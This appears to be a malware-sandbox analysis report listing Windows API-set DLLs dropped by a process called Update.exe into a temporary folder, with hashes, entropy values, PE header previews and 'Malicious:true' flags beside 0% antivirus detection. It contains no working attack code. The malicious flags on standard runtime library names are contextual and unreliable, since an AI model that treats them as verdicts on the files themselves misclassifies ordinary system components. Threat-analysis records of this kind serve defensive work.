                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d..._............." .........................................................@......1.....`.........................................`................0...................'..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-2-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.862975499159515
                                  Encrypted:false
                                  SSDEEP:192:WKMWfhW0eWvcuyjS7HnhWgN7a8WhMcy/JdSh+Il+jX01k9z3ARvXdRfn8x:W9WfhWe7HRN7DcMyEjR9zSvn8x
                                  MD5:49E3260AE3F973608F4D4701EB97EB95
                                  SHA1:097E7D56C3514A3C7DC17A9C54A8782C6D6C0A27
                                  SHA-256:476FBAD616E20312EFC943927ADE1A830438A6BEBB1DD1F83D2370E5343EA7AF
                                  SHA-512:DF22CF16490FAA0DC809129CA32EAF1A16EC665F9C5411503CE0153270DE038E5D3BE1E0E49879A67043A688F6C42BDB5A9A6B3CEA43BF533EBA087E999BE653
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...m............." .........................................................0.......X....`.........................................`...L............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l2-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.946959524345588
                                  Encrypted:false
                                  SSDEEP:192:WrVzWfhW5eWvcuyjS7HnhWgN7a8Wh/g26WGaN4NhrJgX01k9z3An9fXPu:WrVzWfhW57HRN7qTN4tgR9zY8
                                  MD5:7F14FD0436C066A8B40E66386CEB55D0
                                  SHA1:288C020FB12A4D8C65ED22A364B5EB8F4126A958
                                  SHA-256:C78EAB8E057BDDD55F998E72D8FDF5B53D9E9C8F67C8B404258E198EB2CDCF24
                                  SHA-512:D04ADC52EE0CEED4131EB1D133BFE9A66CBC0F88900270B596116064480AFE6AE6CA42FEB0EAED54CB141987F2D7716BB2DAE947A025014D05D7AA0B0821DC50
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....'............" .........................................................0......w.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-handle-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.862911306065441
                                  Encrypted:false
                                  SSDEEP:192:WxWfhWmeWvcuyjS7HnhWgN7aUWhR1+Eh+Il+jX01k9z3AReXz:WxWfhWg7HRN7eEQEjR9zSeD
                                  MD5:10F0C22C19D5BEE226845CD4380B4791
                                  SHA1:1E976A8256508452C59310CA5987DB3027545F3D
                                  SHA-256:154EF0BF9B9B9DAA08101E090AA9716F0FA25464C4EF5F49BC642619C7C16F0E
                                  SHA-512:3A5D3DC6448F65E1613E1A92E74F0934DD849433CECA593E7F974310CD96BF6AD6CCC3B0CB96BDB2DCC35514BC142C48CB1FD20FEE0D8FA236999AD155FC518B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0...........`.........................................`...`............ ...................'..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-heap-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.815548225091973
                                  Encrypted:false
                                  SSDEEP:192:WUZlKWfhWieWvcuyjS7HnhWgN7a8WhwXh+Il+jX01k9z3ARxiXNk:W6lKWfhWM7HRN7J5EjR9zSw9k
                                  MD5:405038FB22CD8F725C2867C9B4345B65
                                  SHA1:385F0EB610FCE082B56A90F1B10346C37C19D485
                                  SHA-256:1C1B88D403E2CDE510741A840AFA445603F76E542391547E6E4CC48958C02076
                                  SHA-512:B52752AC5D907DC442EC7C318998FD54AD9AD659BDE4350493FE5CA95286ECEFCBBBF82D718D4BF4E813B4D20A62CD1F7BA11EE7C68C49EC39307B7746968D18
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....Bb.........." .........................................................0......[.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-interlocked-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.877222097685592
                                  Encrypted:false
                                  SSDEEP:192:WzWfhWceWvcuyjS7HnhWgN7a8Whkh+Il+jX01k9z3ARNXJXEmo:WzWfhWG7HRN7NEjR9zSN5XJo
                                  MD5:AFF9165CFF0FB1E49C64B9E1EAEFDD86
                                  SHA1:CDEF56AB5734D10A08BC373C843ABC144FE782CB
                                  SHA-256:159ECB50F14E3C247FAEC480A3E6E0CF498EC13039C988F962280187CEE1391D
                                  SHA-512:64DDF8965DEFAF5E5AE336D37BDB3868538638BAD927E2E76E06ACE51A2BCA60AEFAAB18C300BB7E705F470A937AD978EDD0338091AD6BCC45564C41071EEB40
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-libraryloader-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14248
                                  Entropy (8bit):6.819759709049553
                                  Encrypted:false
                                  SSDEEP:192:WivuBL3BBLJWfhWGeWvcuyjS7HnhWgN7a8WhfZVh+Il+jX01k9z3ARLFXWk:WivuBL3BrWfhWA7HRN7cZLEjR9zSZGk
                                  MD5:4334F1A7B180998473DC828D9A31E736
                                  SHA1:4C0C14B5C52AB5CF43A170364C4EB20AFC9B5DD4
                                  SHA-256:820E3ACD26AD7A6177E732019492B33342BC9200FC3C0AF812EBD41FB4F376CB
                                  SHA-512:7F2A12F9D41F3C55C4AFF2C75EB6F327D9434269EBFF3FBCC706D4961DA10530C069720E81B1573FAF919411F929304E4AAF2159205CF9A434B8833EEA867AA9
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-localization-l1-2-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):15776
                                  Entropy (8bit):6.867557538513122
                                  Encrypted:false
                                  SSDEEP:384:WbOMw3zdp3bwjGjue9/0jCRrndbWsWfhWU7HRN7ApUad+JR9zuszu:yOMwBprwjGjue9/0jCRrndbGDVadk9zk
                                  MD5:71457FD15DE9E0B3AD83B4656CAD2870
                                  SHA1:C9C2CAF4F9E87D32A93A52508561B4595617F09F
                                  SHA-256:DB970725B36CC78EF2E756FF4B42DB7B5B771BFD9D106486322CF037115BD911
                                  SHA-512:A10FCF1D7637EFFFF0AE3E3B4291D54CC7444D985491E82B3F4E559FBB0DBB3B6231A8C689FF240A5036A7ACAE47421CDA58AAA6938374D4B84893CCE0077BC8
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....V............" .........................................................0............`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-memory-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.854527300629819
                                  Encrypted:false
                                  SSDEEP:192:W/qWfhW0eWvcuyjS7HnhWgN7a8Wh+Yq21eX01k9z3ABfNB/xqw:W/qWfhWe7HRN7Ql8R9zmfNB0w
                                  MD5:D39FBBEAC429109849EC7E0DC1EC6B90
                                  SHA1:2825C7ABA7F3E88F7B3D3BC651BBC4772BB44AD0
                                  SHA-256:AEEC3D48068137870E6E40BAD9C9F38377AA06C6EA1AC288E9E02AF9E8C28E6B
                                  SHA-512:B4197A4D19535E20ED2AFF4F83ACED44E56ABBB99CE64E2F257D7F9B13882CBDB16D8D864F4923499241B8F7D504D78FF93F22B95F7B02996B15BB3DA1A0EF42
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....2..........." .........................................................0............`.........................................`...l............ ...................'..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-namedpipe-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.955574425170444
                                  Encrypted:false
                                  SSDEEP:192:WUWfhWyeWvcuyjS7HnhWgN7a8WhYw0mh+Il+jX01k9z3ARj4XGAzux:WUWfhWc7HRN7GXEjR9zSk2AzA
                                  MD5:0E5CD808E9F407E75F98BBB602A8DF48
                                  SHA1:285E1295A1CF91EF2306BE5392190D8217B7A331
                                  SHA-256:1846947C10B57876239D8CB74923902454F50B347385277F5313D2A6A4E05A96
                                  SHA-512:7D8E35CABE7C3B963E6031CD73DC5AD5EDF8B227DF735888B28D8EFB5744B531F0C84130E47624E4FEA8EF700EABDE20A4E2290A1688A6ACFFB6A09CA20D7085
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....5..........." .........................................................0......z.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processenvironment-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14248
                                  Entropy (8bit):6.824261156098003
                                  Encrypted:false
                                  SSDEEP:192:WAWWfhWZeWvcuyjS7HnhWgN7a8Wh0Dq21eX01k9z3ABfNBd5++x:WAWWfhWZ7HRN7rDl8R9zmfNBf+k
                                  MD5:CC52CD91B1CBD20725080F1A5C215FCC
                                  SHA1:2CE6A32A5BD6FA9096352D3D73E7B19B98E0CC49
                                  SHA-256:990DC7898FD7B442D50BC88FEC624290D69F96030A1256385391B05658952508
                                  SHA-512:D262F62ADDE8A3D265650A4B56C866BDD2B660001FB2CA679D48EE389254E9FFA6CE9D69F2AAA619D22A155A5523DCE5F7CFDD7638C0E9DF1FE524B09520D5A3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....h..........." .........................................................0......8.....`.........................................`...H............ ...................'..............T............................................................................rdata..T...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):15272
                                  Entropy (8bit):6.869458023567228
                                  Encrypted:false
                                  SSDEEP:384:WyWXk1JzNcKSIHWfhWH7HRN7pEjR9zSgX:BbcKStkpEF9zZ
                                  MD5:2DD711EA0F97CB7C5AB98AE6F57B9439
                                  SHA1:CBA11E3EEBE7B3D007EB16362785F5D1D1251ACD
                                  SHA-256:A958FD20C06C90112E9E720047D84531B2BD0C77174660DC7E1F093A2ED3CC68
                                  SHA-512:D8D39CA07FDFED6A4E5686EAE766022941C19BFBCEB5972EDD109B453FD130B627E3E2880F8580A8A41601493D0C800E64A76E8590070AA13C1ABD550BD1A1BA
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....,-a.........." .........................................................0......$.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-1.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.883994552966322
                                  Encrypted:false
                                  SSDEEP:192:WKtyDfIe9jWfhWyReWvcuyjS7HnhWgN7a8WhXO/h+Il+jX01k9z3AR/iXiz:WKtyDfIe9jWfhWyR7HRN7Y6EjR9zSqe
                                  MD5:E93816C04327730D41224E7A1BA6DC51
                                  SHA1:3F83B9FC6291146E58AFCE5B5447CD6D2F32F749
                                  SHA-256:CA06CCF12927CA52D8827B3A36B23B6389C4C6D4706345E2D70B895B79FF2EC8
                                  SHA-512:BEAAB5A12BFC4498CDF67D8B560EF0B0E2451C5F4634B6C5780A857666FD14F8A379F42E38BE1BEEFA1C3578B2DF913D901B271719AC6794BFAAB0731BB77BCA
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...I............." .........................................................0......V.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-profile-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):12712
                                  Entropy (8bit):6.988937791517322
                                  Encrypted:false
                                  SSDEEP:192:W7AaVWfhWdieWvcuyjS7HnhWgN7a8Whvrq21eX01k9z3ABfNBo3:W7AIWfhWdM7HRN7Ul8R9zmfNB0
                                  MD5:051847E7AA7A40A1B081FF4B79410B5B
                                  SHA1:4CA24E1DA7C5BB0F2E9F5F8CE98BE744EA38309E
                                  SHA-256:752542F72AF04B3837939F0113BFCB99858E86698998398B6CD0E4E5C3182FD5
                                  SHA-512:1BFB96D15DF1CD3DCEFC933AECA3CE59BEF90E4575A66EAAB92386F8E93652906626308886DD9B82C0863D1544331BBF99BE8E781FA71D8C4C1F5FFF294056DC
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...xc.].........." .........................................................0......Eg....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-rtlsupport-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.826511666056111
                                  Encrypted:false
                                  SSDEEP:192:WLGeVxWfhWkeWvcuyjS7HnhWgN7a8WhZch+Il+jX01k9z3ARLXX:WLGeVxWfhWO7HRN7HEjR9zSLn
                                  MD5:2AA1F0C20DFB4586B28FAF2AA16B7B00
                                  SHA1:3C4E9C8FCA6F24891430A29B155876A41F91F937
                                  SHA-256:D2C9EE6B1698DFE99465AF4B7358A2F4C199C907A6001110EDBEA2D71B63CD3F
                                  SHA-512:AE05338075972E258BCF1465E444C0A267AD6F03FBB499F653D9D63422A59AC28F2CB83EC25F1181699E59ECBAAC33996883E0B998CBADE1CC011BC166D126D0
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...L.\w.........." .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-string-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.908697555398443
                                  Encrypted:false
                                  SSDEEP:192:WvyMv9WfhW0FCeWvcuyjS7HnhWgN7a8Wh/kkQOh+Il+jX01k9z3ARpXZE:WvyMv9WfhWas7HRN7x0EjR9zSppE
                                  MD5:6E5DA9819BD53DCB55ABDE1DA67F3493
                                  SHA1:8562859EBF3CE95F7ECB4E2C785F43AD7AAAF151
                                  SHA-256:30DC0DEB0FAF0434732F2158AD24F2199DEF8DD04520B9DAABBC5F0B3B6DDF40
                                  SHA-512:75EB227CA60FF8E873DAC7FA3316B476B967069E8F0AC31469B2DE5A9B21044DB004353FEBF2B53069392BE10A8BF40563BB5D6D4BE774D37D12CF6FBECED175
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0.......v....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):15272
                                  Entropy (8bit):6.791010772317001
                                  Encrypted:false
                                  SSDEEP:384:WWdv3V0dfpkXc0vVaCWfhWU7HRN7wTN4tgR9zYYB:/dv3VqpkXc0vVabjwTNx9zlB
                                  MD5:F378455FB81488F5BFD3617E3C5A75C0
                                  SHA1:312FA1343498E99565B1FBF92E6E1E05351CBC99
                                  SHA-256:91E50F94A951AA4E48A9059AD222BBE132B02E83D4A7DF94A35EA73248E84800
                                  SHA-512:11D80D4F58DA3827A317A3C1ED501432050E123EB992ED58C7765C68DDD2FC49B04398149E73FDB9FB3AA4494B440333AA26861B796E7AE8C7AD730F4FAF99F7
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`...X............ ...................'..............T............................................................................rdata..X...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-2-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.926691835908429
                                  Encrypted:false
                                  SSDEEP:192:WttZ36WfhWBaeWvcuyjS7HnhWgN7a8WhEaNh+Il+jX01k9z3ARPXnge:WttZ36WfhWBk7HRN7LMEjR9zSP3z
                                  MD5:5E393142274D7589AD3DF926A529228C
                                  SHA1:B9CA32FCC7959CB6342A1165B681AD4589C83991
                                  SHA-256:219CC445C1AD44F109219A3BB6900AB965CB6357504FC8110433B14F6A9B57BE
                                  SHA-512:5EB31BE9BCE51A475C18267D89EE7B045AF37B9F0722BAAA85764114326C7A8D0A1662135E102D7AC074C24A6035232A527FC8745139A26CB62F33913ACE3178
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......C.....`.........................................`...x............ ...................'..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-sysinfo-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14248
                                  Entropy (8bit):6.829698799977648
                                  Encrypted:false
                                  SSDEEP:192:WWKIMFqnWfhWpeWvcuyjS7HnhWgN7a8Wh8oSh+Il+jX01k9z3ARMiXxT8:WWTnWfhWp7HRN7poqEjR9zSXm
                                  MD5:7B997BD96CB7FA92DEE640D5030F8BEA
                                  SHA1:EE258D5F6731778363AA030A6BC372CA9A34383C
                                  SHA-256:4BCD366EAF0BDE99B472FA2BF4E0DDA1D860B3F404019FB41BBB8AD3A6D4D8F2
                                  SHA-512:92B9F4DD0B8CC66A92553418A1E18BBBEE775F4051CD49AF20505151BE20B41DB11D42C7F2436A6FA57E4C55F55A0519A1960E378F216BA4D7801E2EFB859B2A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...hI$..........." .........................................................0............`.........................................`...H............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-timezone-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13736
                                  Entropy (8bit):6.908054226003342
                                  Encrypted:false
                                  SSDEEP:192:W2HtoXeOWfhWteWvcuyjS7HnhWgN7a8WhPh+Il+jX01k9z3ARiXC:WmOWfhWd7HRN7IEjR9zSiS
                                  MD5:ACF40D5E6799231CF7E4026BAD0C50A0
                                  SHA1:8F0395B7E7D2AAC02130F47B23B50D1EAB87466B
                                  SHA-256:64B5B95FE56B6DF4C2D47D771BEC32BD89267605DF736E08C1249B802D6D48D1
                                  SHA-512:F66A61E89231B6DC95B26D97F5647DA42400BC809F70789B9AFC00A42B94EA3487913860B69A1B0EE59ED5EB62C3A0CADE9E21F95DA35FDD42D8CE51C5507632
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....\]\.........." .........................................................0......Sp....`.........................................`...H............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-util-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):13224
                                  Entropy (8bit):6.845813488265057
                                  Encrypted:false
                                  SSDEEP:192:WfRWWfhWEeWvcuyjS7HnhWgN7a8WhAq21eX01k9z3ABfNBhKD5lx:WfRWWfhWu7HRN7rl8R9zmfNBUD5lx
                                  MD5:7A75BC355CA9F0995C2C27977FA8067E
                                  SHA1:1C98833FD87F903B31D295F83754BCA0F9792024
                                  SHA-256:52226DC5F1E8CD6A22C6A30406ED478E020AC8E3871A1A0C097EB56C97467870
                                  SHA-512:BA96FDD840A56C39AAA448A2CFF5A2EE3955B5623F1B82362CB1D8D0EC5FBB51037BDC9F55FE7B6C9F57932267E151E167E7F8D0CB70E907D03A48E0C2617B5B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......Z.........." .........................................................0.......I....`.........................................`...<............ ...................'..............T............................................................................rdata..8...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-conio-l1-1-0.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):14240
                                  Entropy (8bit):6.852755058390383
                                  Encrypted:false
                                  SSDEEP:384:Woc5WfhWW7HRN7yI4hBnRmuTcR9z/BIWd:7hxyH7RmuU9zld
                                  MD5:19876C0A273C626F0E7BD28988EA290E
                                  SHA1:8E7DD4807FE30786DD38DBB0DACA63256178B77C
                                  SHA-256:07FDA71F93C21A43D836D87FEE199AC2572801993F00D6628DBA9B52FCB25535
                                  SHA-512:CDD405F40AC1C0C27E281C4932FBBD6CC84471029D7F179ECF2E797B32BF208B3CD0CA6F702BB26F070F8CDD06B773C7BEB84862E4C01794938932146E74F1CA
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
